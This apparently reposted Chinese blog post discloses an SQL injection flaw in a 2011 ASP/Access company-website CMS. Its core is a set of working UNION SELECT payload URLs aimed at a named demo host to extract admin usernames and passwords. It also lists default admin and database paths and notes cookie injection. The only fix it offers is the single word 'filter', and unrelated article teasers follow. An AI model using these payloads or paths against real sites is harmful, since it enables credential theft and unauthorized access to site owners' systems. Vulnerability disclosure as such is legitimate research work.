冠龍科技企業網站管理系統 2011 sql注入漏洞及修復

原創 Vken 2019-11-06 14:04

源碼簡介:
冠龍科技企業網站管理系統是基於ASP+ACCESS技術開發的電子商務平臺,屬於全自動化、全智能的在線方

式管理、維護、更新的網站管理系統。此係統直接上傳到你的網站空間就可以使用了。完全後臺操作。

×××:
http://www.mycodes.net/25/4771.htm

Demo:
http://www1.glgk.com/2011/

默認後臺:
http://www.xxxx.net/admin/login.asp

默認數據庫:
http://www.xxxx.net/databases/%23database.mdb

exp:
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,username%2bpassword,3,4,5 from admin

或者單獨查:
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,username,3,4,5 from admin
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,password,3,4,5 from admin

另外還存在多處的漏洞.可cookies注入.

上次有朋友問%2b是什麼?就是ascii碼的"+"號的十六進制值.

修復:過濾.

轉自: Mr.DzY

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

大學生的福利,課設的福音,學習成績管理系統源碼精講

       臨近學期末,最近也是蠻多同學在糾結課設的問題與實現,這裏幫助大家做一期學生成績管理系統源碼分享與精講,希望能夠幫助到大家的學習,給大家一些啓發,相關視頻資料講解可以私聊小編分享,一起進步一起加油。

C语言大叔 2020-07-06 16:11:31

輕公司的成長煩惱

  當滿面微笑的百事可樂首席市場官許智偉身着今夏流行的粉紅色襯衫代言PPG的廣告時,互聯網上的網友們卻正在無數個論壇裏對PPG進行討伐。        這些討伐者大多通過電話和互聯網買了PPG的襯衫,但是他們也把對PPG的不滿,發泄在互聯

luoluo3875 2020-07-08 06:52:51

程序學習路線圖

程序基礎:算法導論,編譯原理 操作系統;  linux->windows 語言學習:java,c++,c# 網絡學習:HTML,CSS->PHP->JAVASCRIPT->AJAX->jquery 多媒體:ps,視頻,動畫; 應用:網絡爬

libertea 2020-07-08 03:45:33

WorldFirst萬里匯推出港幣和離岸人民幣賬戶!

過去數年,中國市場呈爆發性的增長,如今已成爲全球領先的製造業的和出口樞紐中心。因此,萬里匯WorldFirst(以下簡稱“WorldFirst”) 搶佔先機,將包括電子商務賬戶在內的所有產品中增加了港幣和離岸人民幣賬戶。 如果您已擁有電

qq_38461703 2020-07-08 00:17:07

連連與Cdiscount達成戰略合作,一鍵入駐開拓新藍海!

成立於1998年的Cdiscount是法國目前極受歡迎的本土電商網站,也是法國現今最大的電子商務平臺之一。近日,連連國際正式成爲Cdiscount官方推薦的收款服務商,雙方將藉助各自品牌和服務優勢,推動資源互換和共享,共促跨境電商生態良性

qq_38461703 2020-07-08 00:17:04

連連已支持美國社交電商Top平臺Passfeed收款!

近日,連連跨境支付宣佈已正式接入了美國社交電商平臺Passfeed收款,賣家可通過連連賬戶輕鬆收取Passfeed的款項。作爲跨境支付業務先行者,連連一直致力於爲中國跨境電商賣家提供高效、便捷的跨境收款服務,幫助賣家搶佔先機,自跨境收款服

qq_38461773 2020-07-07 22:42:54

德國跨境電商real.de綁定連連跨境支付收款教程!

Real Digital成立於2015年,是德國零售巨頭Real集團的一部分。隨着2016年收購電商平臺HitMeister,real.de發展成爲一個技術成熟且家喻戶曉的電商平臺。這一被無數賣家看好的潛在黑馬,剛上線不久便以 +128%

qq_38461773 2020-07-07 22:42:54

重磅:萬里匯WorldFirst電商賬戶取消最低提現金額限制!

萬里匯WorldFirst自從2019年被螞蟻金服收購以後,推出了一系列的大動作。其中,最厲害的就是:萬里匯WorldFirst跨境電商提現費0.3%起,最低至0!這幾乎就是行內最低的提現收費了,給廣大的小夥伴們帶來了實惠。但是,萬里匯W

qq_38461773 2020-07-07 22:42:43

法國電商平臺Darty綁定連連跨境支付收款教程!

Groupe Fnac Darty,前身是Kesa Electricals plc,Darty plc和Darty Limited,創立於1957 年,總部位於法國塞納河畔伊夫裏的跨國電器零售公司。主營產品包括大小型家電,傢俱,信息電子類

qq_38461388 2020-07-07 09:32:33

Payoneer派安盈如何收款亞馬遜新加坡站?

美國東部時間10月8日,亞馬遜宣佈推出新加坡站點Amazon.sg,爲該國消費者帶來更多的購物方式和數百萬產品。目前,新加坡站開放的產品類目十三大類,包括嬰兒用品、美妝、食品雜貨、個護與保健用品、電子產品等。 東南亞的互聯網經濟正處於蓬

qq_38461341 2020-07-07 06:52:24

中國最年輕的億萬富翁 80後富翁發家史

    目前中國最年輕的億萬富翁有4人:高燃、李想、戴志康、茅侃侃! 高燃、李想和戴志康生於1981年,茅侃侃生於1983年。 李想的泡泡網2005年底營收達2000萬,利潤50%,按通行的市場收購標準,即以20倍的市盈率來計算,佔公

maite168 2020-07-06 13:29:24

Windows Update C++ Tools -立哥開發

Vision Jacky-1.8 FileName=Windows Update Reset.dev.jacky Name=Reset Windows Update Tools Type=1 Ver=2 ObjFiles= Inc

小可爱J 专业嵌入式开发 2020-07-05 23:20:16

關於asp.net中購物車的模式

購物車是電子商務網站中不可缺少的組成部分,但目前大多數購物車只能作爲一個顧客選中商品的展示,客戶端無法將購物車裏的內容提取出來滿足自己事務處理的需要,而這一點在有些電子商務活動中很有必要。XML的出現使得網絡上傳輸的數據變得有意義起來,我

xiabaohua1987 2020-07-05 06:42:49

京東噹噹之戰督促B2C行業儘快規範

<br />要說最近網絡世界最火爆的話題,那無疑是京東與噹噹之間展開的戰爭,從兩大B2C平臺CEO的口水戰,到“你少一點,我比你更少”的真刀真槍的價格

wangk1026 2020-07-04 23:19:21

左手淘寶右手國美體育,阿迪達斯欲拉耐克李寧下馬

<br />   在讀大學的時候,全寢室的哥們以穿一雙阿迪或者耐克在球場上出風頭吸引女生爲首要目標,穿國產牌子的同學雖說不會被歧視,但是氣場總沒有買名

wangk1026 2020-07-04 23:19:10